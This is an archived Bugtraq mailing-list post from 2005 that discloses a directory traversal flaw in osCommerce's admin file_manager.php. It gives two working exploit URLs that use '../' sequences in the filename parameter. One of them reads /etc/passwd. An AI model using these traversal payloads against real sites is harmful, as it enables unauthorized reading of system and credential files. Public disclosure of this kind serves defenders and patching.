[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

osCommerce File Manager Directory Traversal Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: osCommerce File Manager Directory Traversal Vulnerability
From: Megasky <magasky@xxxxxxxxxxx>
Date: 22 Mar 2005 16:32:05 -0000


there is allready a post on this that have 
file_manager.php?action=download&filename=../../../../../../etc/passwd 
 
sometime the action=download doesn't work , so i tried action=read
/admin/file_manager.php?action=read&filename=../../../../

Follow-Ups:
- Re: osCommerce File Manager Directory Traversal Vulnerability
  - From: Aikanáro Calaelen

Prev by Date: Black Hat Briefings & Trainings: Registration now open!
Next by Date: RE: [VulnWatch] Details of Sybase ASE bugs withheld
Previous by thread: Black Hat Briefings & Trainings: Registration now open!
Next by thread: Re: osCommerce File Manager Directory Traversal Vulnerability
Index(es):
- Date
- Thread